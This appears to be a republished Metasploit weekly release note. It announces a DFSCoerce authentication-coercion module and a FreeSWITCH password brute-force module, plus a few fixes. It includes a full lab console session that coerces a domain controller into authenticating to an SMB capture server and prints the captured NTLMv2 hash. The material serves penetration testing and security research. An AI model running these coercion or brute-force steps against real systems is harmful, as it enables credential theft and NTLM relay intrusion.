Metasploit Weekly Wrap-Up - API Security Blog

Main / Metasploit Weekly Wrap-Up

Metasploit Weekly Wrap-Up

Discription

## DFSCoerce – Distributing more than just files

![Metasploit Weekly Wrap-Up](https://blog.rapid7.com/content/images/2022/07/metasploit-fence.png)

DFS (Distributed File System) is now distributing Net-NTLM credentials thanks to [Spencer McIntyre]() with a new `auxiliary/scanner/dcerpc/dfscoerce ` module that is similar to PetitPotam in how it functions. Note that unlike PetitPotam, this technique does require a normal domain users credentials to work.

The following shows the workflow for targeting a 64-bit Windows Server 2019 domain controller. Metasploit is hosting an SMB capture server to log the incoming credentials from the target machine account:

msf6 > use auxiliary/server/capture/smb
msf6 auxiliary(server/capture/smb) > run
[*] Auxiliary module running as background job 0.
msf6 auxiliary(server/capture/smb) >
[*] Server is running. Listening on 0.0.0.0:445
[*] Server started.
msf6 auxiliary(server/capture/smb) > use auxiliary/scanner/dcerpc/dfscoerce
msf6 auxiliary(scanner/dcerpc/dfscoerce) > set RHOSTS 192.168.159.96
RHOSTS => 192.168.159.96
msf6 auxiliary(scanner/dcerpc/dfscoerce) > set VERBOSE true
VERBOSE => true
msf6 auxiliary(scanner/dcerpc/dfscoerce) > set SMBUser aliddle
SMBUser => aliddle
msf6 auxiliary(scanner/dcerpc/dfscoerce) > set SMBPass Password1
SMBPass => Password1
msf6 auxiliary(scanner/dcerpc/dfscoerce) > run
[*] 192.168.159.96:445 – Connecting to Distributed File System (DFS) Namespace Management Protocol
[*] 192.168.159.96:445 – Binding to netdfs…
[+] 192.168.159.96:445 – Bound to netdfs
[+] Received SMB connection on Auth Capture Server!
[SMB] NTLMv2-SSP Client : 192.168.250.237
[SMB] NTLMv2-SSP Username : MSFLABWIN-3MSP8K2LCGC$
[SMB] NTLMv2-SSP Hash : WIN-3MSP8K2LCGC$::MSFLAB:971293df35be0d1c:804d2d329912e92a442698d0c6c94f08:01010000000000000088afa3c78cd801bc3c7ed684c95125000000000200120057004f0052004b00470052004f00550050000100120057004f0052004b00470052004f00550050000400120057004f0052004b00470052004f00550050000300120057004f0052004b00470052004f0055005000070008000088afa3c78cd80106000400020000000800300030000000000000000000000000400000f0ba0ee40cb1f6efed7ad8606610712042fbfffb837f66d85a2dfc3aa03019b00a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003200350030002e003100330034000000000000000000
[+] 192.168.159.96:445 – Server responded with ERROR_ACCESS_DENIED which indicates that the attack was successful
[*] 192.168.159.96:445 – Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/dcerpc/dfscoerce) >

## FreeSwitch Brute Force Login

A returning contributor [krastanoel]() has brought us a module for brute forcing the login credential for the FreeSWITCH event socket service.
This is even simpler to use than our usual login scanner modules since there’s no need to determine or brute force a username only the password is required!

## New module content (2)

* [DFSCoerce]() by Spencer McIntyre, Wh04m1001, and xct_de – This adds a scanner module that implements the dfscoerce technique. Although this technique leverages MS-DFSNM methods, this module works similarly to PetitPotam in that it coerces authentication attempts to other machines over SMB. This ability to coerce authentication attempts makes it particularly useful in NTLM relay attacks.
* [FreeSWITCH Event Socket Login]() by krastanoel – This adds an auxiliary scanner module that brute forces the FreeSwitch’s event socket service login interface to guess the password.

## Enhancements and features (1)

* [#16716]() from [bcoles]() – This updates HTTP Command stagers to expose the CMDSTAGER::URIPATH option, so users can choose where to host the payload when using a command stager.

## Bugs fixed (3)

* [#16704]() from [gwillcox-r7]() – This fixes an issue when targeting some faulty `memcached` servers that return an error when extracting the keys and values stored in `slabs`. The module no longer errors out with a type conversion error.
* [#16724]() from [bcoles]() – This updates and fixes the `exploit/windows/iis/ms01_026_dbldecode` module. It now uses the standard HttpClient, the TFTP stager has been fixed, and Meterpreter specific code has been removed since Meterpreter is not available on Server 2000 systems since Metasploit v6.
* [#16731]() from [space-r7]() – Fixes a logic bug in the process API that would cause additional permissions to be requested than what was intended.

## Get it

As always, you can update to the latest Metasploit Framework with `msfupdate`
and you can get more details on the changes since the last blog post from
GitHub:

* [Pull Requests 6.2.5…6.2.6]()
* [Full diff 6.2.5…6.2.6]()

If you are a `git` user, you can clone the [Metasploit Framework repo]() (master branch) for the latest.
To install fresh without using git, you can use the open-source-only [Nightly Installers]() or the
[binary installers]() (which also include the commercial edition).Read More

References

Back to Main

Subscribe for the latest news: